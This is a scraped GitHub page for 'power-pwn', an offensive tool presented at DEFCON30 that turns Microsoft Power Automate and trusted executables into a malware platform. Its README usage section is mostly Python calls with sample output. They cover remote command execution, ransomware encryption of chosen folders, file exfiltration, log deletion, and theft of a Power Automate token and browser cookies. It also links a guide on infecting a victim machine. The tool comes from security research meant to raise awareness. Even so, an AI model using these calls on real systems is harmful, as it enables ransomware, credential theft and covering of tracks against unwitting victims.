8000 GitHub - Pooch11/power-pwn: A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation
[go: up one dir, main page]
More Web Proxy on the site http://driver.im/
Skip to content
/ power-pwn Public
forked from mbrg/power-pwn

A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation

License

MIT license
0 stars 99 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

Pooch11/power-pwn

BranchesTags
 
 

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

29 Commits
assets
assets
 
 
docs
docs
 
 
schema
schema
 
 
solution/pwntoso_1_0_0_1
solution/pwntoso_1_0_0_1
 
 
src/powerpwn
src/powerpwn
 
 
.gitignore
.gitignore
 
 
license
license
 
 
readme.md
readme.md
 
 
setup.txt
setup.txt
 
 

Repository files navigation

Power Pwn

Power Pwn is a demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation.

Power Pwn

This tool was released as part of DEFCON30. For more details, see No-Code Malware: Windows 11 At Your Service.

Disclaimer: these materials are presented from an attacker’s perspective with the goal of raising awareness to the risks of underestimating the security impact of No Code/Low Code. No Code/Low Code is awesome.

Usage

from powerpwn.cli import PowerPwn
POST_URL = ""
pp=PowerPwn(post_url=POST_URL)

### code execution

# python2
pp.exec_py2("print('hello world')").CodeExec
# CodeExecOutputs(ScriptOutput='\ufeffhello world\r\n', ScriptError='')

# python2 bad syntax
pp.exec_py2("bad syntax").CodeExec
# CodeExecOutputs(ScriptOutput='', ScriptError='  File "", line 1\r\n    bad syntax\r\n        ^\r\nSyntaxError: unexpected token \'syntax\'')

# powershell
pp.exec_ps("Write-Host \"hello word\"").CodeExec

# commandline
pp.exec_cmd("echo \"hello word\"").CodeExec
# CodeExecOutputs(ScriptOutput='Microsoft Windows [Version 10.0.22000.795]\r\n(c) Microsoft Corporation. All rights reserved.\r\n\r\nC:\\Program Files (x86)\\Power Automate Desktop>echo "hello word"\r\n"hello word"\r\n\r\n', ScriptError='')

### ransomware

pp.ransomware(crawl_depth=2, dirs_to_init_crawl=["C:\\Users\\alexg\\Documents\\mystuff", "D:\\shh"], encryption_key="8d1d4245").Ransomware
# Ransomware=RansomwareOutputs(FilesFound=9, FilesAccessed=9, FilesProcessed=9, Errors='')

### exfiltration

pp.exfil(target="C:\\Users\\alexg\\Downloads\\takeit.txt").Exfil
# ExfiltrationOutputs(Success=True, FileContents='asd')
pp.exfil(target="C:\\Users\\alexg\\Downloads\\dontexist.txt").Exfil
# ExfiltrationOutputs(Success=False, FileContents='')

### cleanup

pp.cleanup().Cleanup
# CleanupOutputs(FilesFound=179, LogFilesDeleted=178)

### steal_power_automate_token

pp.steal_power_automate_token().StealPowerAutomateToken
# StealPowerAutomateTokenOutputs(Token='ey...')

### steal_cookie
pp.steal_cookie("https://www.google.com").StealCookie
# StealCookieOutputs(Cookie='1P_JAR=2022-07-16-13; OGPC=19027681-1:')

How To

How to set up your Power Pwn cloud environment

How to infect a victim machine

How to troubleshoot execution errors

About

A demo showing how to repurpose Microsoft-trusted executables, service accounts and cloud services to power a malware operation

Resources

Readme

License

MIT license
Activity

Stars

0 stars

Watchers

0 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages

  • Python 100.0%
0